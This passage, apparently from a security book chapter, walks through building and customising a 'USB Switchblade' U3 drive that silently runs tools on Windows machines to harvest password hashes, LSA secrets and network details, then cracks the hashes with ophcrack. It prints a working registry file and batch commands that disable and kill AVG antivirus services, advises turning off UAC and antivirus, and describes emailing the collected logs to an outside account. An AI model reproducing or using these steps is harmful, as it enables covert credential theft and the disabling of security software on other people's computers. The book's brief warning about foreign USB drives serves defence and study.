.\wul.exe /stext %tmplog% >> %log% 2>&1
Network Statistics
The network statistics command displays active network connections, listening ports,
associated processes, and a variety of other network statistics. This tool is already
included on all relevant Windows systems.
netstat.exe -abn >> %log% 2>&1
Port Query
Portqry.exe is a command-line utility that is often used to troubleshoot network con-
nectivity issues. Portqry.exe is included on systems based on Windows 2000, XP,
and 2003 and can be downloaded for use on others. The utility reports the status
of Transmission Control Protocol and User Datagram Protocol ports on a desired
machine. It is able to report listening, nonlistening, and filtered ports individually by
listing or in a sequential range. The most updated version of this tool can be found at
www.microsoft.com/downloads/details.aspx?familyid=89811747-c74b-4638-a2d5-
ac828bdc6983&displaylang=en.
.\portqry -local -l %tmplog% >> %log% 2>&1
The tools described above are already contained in the USB Switchblade pack-
age download provided in the next section. If you intend to use the tools included
in Switchblade, it would be in your best interest to familiarize yourself with each
independently. Each of these tools provides additional parameters and customization
38 CHAPTER 2 USB Switchblade
options depending on your needs. The attack recreation included below will provide
you with a basic understanding of how these are commonly deployed.
Switchblade Assembly
As previously stated, the ultimate goal of USB Switchblade is to simplify the recov-
ery of critical information from computers running Windows 2000 or later. With
administrator access, it is able to retrieve password hashes, LSA secrets, IP informa-
tion, and much more. This section will demonstrate how to build and deploy a U3
flash drive with the -=GonZor=- SwitchBlade technique.
Note
If User Account Control (UAC) is enabled on Vista or Windows 7, the user will be prompted
to allow the execution of the tools within the Switchblade. A dialogue box stating
“Windows need your permission to continue” will be displayed. This must be disabled on
these systems when building the Switchblade and to enable automated retrieval on target
systems.
This first set of directions included will build a default version of Switchblade.
These are provided for quick reference should you encounter an updated release
of the Switchblade software, which may better suit your needs. Customization
instructions will follow these procedures to allow you to update or add to existing
distributions.
1. The Switchblade v2.0 payload needs to be downloaded. This package can be found
at http://rapidshare.com/files/113283682/GonZors_SwitchBlade-V2.0.zip.
2. If you are using an XP system, the Universal Customizer software previously
downloaded for Chapter 1, “USB Hacksaw,” can be used to complete this process.
If you have Vista or 7 systems, download the compatible Universal Customizer at
http://rapidshare.de/files/40767219/Universal_Customizer_1.4.0.2.rar.html.
Warning
If any AV applications are running on the machine you are using to download or create the
U3 Switchblade, problems will be encountered. Most antivirus software will recognize the
tools contained in Switchblade as malicious and will attempt to remove them. To head off
any problems, disable antivirus on the system you are using to build Switchblade.
3. Create a separate directory for each programs you just downloaded and unzip the
files into their respective folders.
4. Place the U3CUSTOM.iso from the Switchblade folder into the bin folder of the
Universal Customizer directory.
5. Insert your U3 USB drive.
6. Launch the Universal Customizer by executing Universal_Customizer.exe.
Inside the Switchblade 39
7. Follow the on-screen instructions and prompts until complete, accepting the
default selections where applicable. Steps 9–13 in the “How to Recreate the
Attack” section of Chapter 1, “USB Hacksaw,” provides detailed directions and
screenshot illustrations for these steps.
8. If you receive a failure at the end, repeat steps 5 and 6 at least three times. If
failures persist, download and install the latest version of the LaunchPad installer
(lpinstaller.exe) at http://mp3support.sandisk.com/downloads/LPInstaller.exe.
Sporadic results can be encountered with this program as well, so let your tena-
cious side shine through.
9. Once you have successfully applied the Switchblade ISO using the Universal
Customizer process, place the SBConfig.exe and ip.shtml from the Switchblade
directory onto the removable disk partition and run SBConfig.exe.
10. Enable the desired tools by checking the appropriate boxes and entering all
other required information. After making your changes, select Update Config.
The next section will describe these and other steps in more detail and pro-
vide caveats for deployments on related systems. This completes a basic USB
Switchblade installation for the GonZor package.
Customizing the Original Payload
The steps below will walk you through updating an existing tool within a payload.
Testing of the package previously prescribed produced some errors when trying to
parse the updated target applications. Changes were made to the wget command
to properly output an external IP address in the log file. Additional procedures are
provided to disable AVG antivirus to smooth the automated initialization of the
Switchblade script. In order to modify the original payload, you will need to extract
the files from the GonZor ISO. This process can be used to update any of the tools
used in the payload. The following will be needed to complete this customization.
• Any U3 drive
• A working version of the GonZor USB Switchblade
• The current version of PsTools or the PsKill utility specifically. The download
location for this was provided in Chapter 1, “USB Hacksaw.”
• Download and install the current version of MagicISO. This tool can be down-
loaded from www.magiciso.com/.
Note
At the time of this writing, the most recent version of the Switchblade payload was v2.0.
1. Create a separate folder for each program you just downloaded and unzip the files
into their respective folders.
2. Create a new directory to extract the original GonZor ISO. We will refer to this
directory as %GONZOR_ISO%\ in the following steps.
3. Copy the U3CUSTOM.iso from the GonZor SwitchBlade payload directory into
%GONZOR_ISO%\.
40 CHAPTER 2 USB Switchblade
4. Open MagicISO and browse to the U3CUSTOM.iso. Right-click the U3CUSTOM.
iso file and extract to %GONZOR_ISO%\.
5. Copy pskill.exe to %GONZOR_ISO%\ SYSTEM\SRC.
Note
AVG 9.0 service name has changed in the registry. For this reason, there are two driver
entries specified in the file for both AVG 8.5 and AVG 9.0 in the next step. If you encounter
a newer release of AVG, this registry file may need to be adjusted to work in an updated
environment.
6. Next, create a .reg file to disable the AVG antivirus services and set them to take
no action in the event of a service failure. Copy and paste the text given below
into a Notepad file and save it as AVKill.reg. Any other services of concern can
be added to this file for disablement. The Start and FailureAction values included
here can be duplicated for the additional services.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,
00,53,00,65,\
00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,
ea,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,
00,53,00,65,\
00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,
ea,00,00
7. Save this Notepad file as AVKill.reg to %GONZOR_ISO%\SYSTEM \SRC \.
8. Locate the go.bat file in %GONZOR_ISO%\SYSTEM \ SRC. Right-click and
select Edit, and then find the 0.dat line in this file.
9. In the go.bat, enter the following text. Killing of other processes is included as a
fail-safe due to inconsistencies found between the various versions of Windows
operating systems. If you added other services to the registry file in step 6, their
associated processes must be included here.
ECHO---------------------------------------------------------------
------------>> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [AVGKill] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO AVG services have been disabled >> %log% 2>&1
REGEDIT /s .\avkill.reg >> %log% 2>&1
.\pskill -t avgam.exe >> %log% 2>&1
Inside the Switchblade 41
.\pskill -t avgrsx.exe >> %log% 2>&1
.\pskill -t avgwdsvc >> %log% 2>&1
.\pskill -t avgnsx.exe >> %log% 2>&1
.\pskill -t avgcsrvx.exe >> %log% 2>&1
.\pskill -t avgtray.exe >> %log% 2>&1
.\pskill -t agrsmsvc.exe >> %log% 2>&1
.\pskill -t avgwdsvc.exe >> %log% 2>&1
)
IF EXIST %include%\19.dat" (
ECHO -------------------------------------------------------------
10. Search and find the 1.dat line in the same file. Place a “;” at the start of these
commands used for the wget. The wget commands should now appear like the
below statements.
;.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
;ECHO. >> %tmplog% 2>&1
;COPY %log%+%tmplog%* %log% >> NUL
;DEL /f /q %tmplog% >NUL
11. Insert the following wget command line just above the old wget command.
.\wget -q -O -
http://whatismyip.com/automation/n09230945.asp >> %log% 2>&1
12. Save and close the file.
13. Copy and paste the entire contents of %GONZOR_ISO%\ (except the
U3CUstom.iso) into the U3Custom folder of the Universal Customizer.
Tip
Ensure that the Universal Customizer\U3Custom directory is empty before you copy the
updated files into it. Only files that you want included in the final ISO should be contained
in this folder.
14. Run the ISOCreate.cmd in the root of the Universal Customizer directory to create
the updated ISO. The output provided should appear similar to Figure 2.1.
15. Press any key when prompted to complete the build.
16. The updated ISO will be placed into the bin directory automatically.
17. Insert your U3 drive and run the Universal_Customizer.exe to load the updated
ISO.
18. Follow the prompts until complete, accepting the default selections, and provide a
password when required. Steps 9–13 in the “How to Recreate the Attack” section
of Chapter 1, “USB Hacksaw,” provide screenshot illustrations for this process.
19. Insert the U3 drive and place the SBConfig.exe (this file is located in the
unpacked Switchblade payload) onto the removable disk partition and run it.
20. Select the tools from the payload that you want to run by checking the boxes,
as shown in Figure 2.2. The output of this script will be sent to a log file on
42 CHAPTER 2 USB Switchblade
Figure 2.1
Universal Customizer ISOCreate Command Window
Figure 2.2
GonZor Payload Configuration Options Dialogue
Inside the Switchblade 43
the removable disk partition of the U3 drive (System/Logs/%computername%/*.
log) after it is run.
21. Optionally, you can enter a valid mail account, password, and connection infor-
mation if you want the Switchblade logs and Hacksaw payloads to be sent to an
external source, as shown in Figure 2.2.
22. The payload will be disabled by default. When you are finished editing, click
Update Config and then Quit. Save the configuration when prompted.
23. You have now established a customized version of the -=GonZor=- Payload
v2.0 on your U3 smart drive, which can be used to retrieve all kinds of goodies
once it is plugged into a computer with administrative privileges.
As you can see, it wasn’t very difficult to customize a smart U3 USB. Use
extreme caution when anyone requests to insert his or her USB flash drive into
your system. The person could easily disguise a legitimate payload as a misdirec-
tion tactic while his or her Switchblade silently performs its magic. Unattended
XP, 2003,Vista, and 7 systems with password-protected screen savers engaged
will not allow autorun to initiate, thus preventing the programmatical process
without authentication. If the screen saver is not protected by a password, auto-
run can be engaged once the desktop becomes active. Windows 95, 98, and ME
screen savers can be circumvented, but these systems are scarcely seen in this
day and age.
Most of the tools worked correctly for Vista, with some success attained
on 7 systems. User interaction was required on both to initiate the script after
Switchblade insertion. To achieve better results on these systems, you will need
to find updated releases of each tool for the respective target operating system or
application.
Windows Password Hashes
Once you have successfully deployed the Switchblade on a target system,
retrieving the passwords from the hashes provided might be required. You will
need the Switchblade log file located on the removable disk partition of the
U3 flash drive (system/logs/%computername%/*.log). The Windows passwords
are hashed using LM and NTLM hashes. The hashes are stored in c:\windows\
system32\config\SAM. To get the passwords, you need to use a Windows pass-
word cracker to convert the LM hash format. The following steps will walk
you through the installation, configuration, and retrieval of a password using
ophcrack.
1. Download ophcrack from http://ophcrack.sourceforge.net/.
2. Double-click the installation executable and click Next, as seen in Figure 2.3.
3. Select all components, as shown in Figure 2.4, and click Next.
4. Install in the default directory, as indicated in Figure 2.5, and click Next.
5. Install the tables in the default directory, as depicted in Figure 2.6, and click
Install.
44 CHAPTER 2 USB Switchblade
Figure 2.3
ophcrack Installation Dialogue
Figure 2.4
ophcrack Installation Dialogue
Inside the Switchblade 45
Figure 2.5
ophcrack Installation Dialogue
Figure 2.6
ophcrack Installation Dialogue
46 CHAPTER 2 USB Switchblade
6. The tool will now be installed and the rainbow tables will be downloaded. A prog-
ress bar should reflect the remaining installation, as seen in Figure 2.7.
7. Click Next when prompted, as portrayed in Figure 2.8.
8. Click Finish to complete the install when prompted, as depicted in Figure 2.9.
9. If errors are encountered during the load or you just need additional tables, these
can be downloaded from the following locations.
• Download the XP Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/XP%20free/tables_xp_free_small.zip/download and
http://sourceforge.net/projects/ophcrack/files/tables/XP%20free/tables_xp_
free_fast.zip/download.
• Download the Vista Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/Vista%20free/tables_vista_free.zip/download.
10. Unzip the files once they are downloaded.
11. Launch ophcrack and click Tables, as shown in Figure 2.10.
12. You should now have a pane displaying the expected tables, which are in Figure 2.11.
Select the required table and click Install. XP free fast was used in this example.
13. Navigate to the location where you saved the table, as seen in Figure 2.12, and
click Install. Keep in mind that storing the rainbow tables on a fast medium like
Figure 2.7
ophcrack Installation Dialogue
Inside the Switchblade 47
Figure 2.8
ophcrack Installation Dialogue
Figure 2.9
ophcrack Installation Dialogue
48 CHAPTER 2 USB Switchblade
Figure 2.10
ophcrack Application
Figure 2.11
ophcrack Program Table Selection
Inside the Switchblade 49
Figure 2.12
ophcrack Program Table Selection
a hard disk or flash drive will significantly speed up the cracking process. Avoid
using tables from CD-ROMs or DVDs.
14. Next, copy and paste the results from the [Dump SAM PWDUMP] section of
the Switchblade log file on the U3 USB drive into a separate Notepad file.
15. Save the file in a known location.
16. In ophcrack, click Load and select PWDUMP file, as depicted in Figure 2.13.
17. Navigate to where you saved the Notepad file (step 15) and select it.
18. The LM hash from the file will be displayed in ophcrack, as shown in Figure 2.14.
19. Select Crack and wait for the results. The status will be displayed as shown in
Figure 2.15.
Given the number of possible password permutations, some results may take
longer than others. A 15-character password with good complexity could be very
difficult to crack, if even possible. Additional rainbow tables can be downloaded and
applied for more thorough analysis of a given hash.
50 CHAPTER 2 USB Switchblade
Figure 2.13
ophcrack Program Load Options
Figure 2.14
ophcrack Program LM Hash Display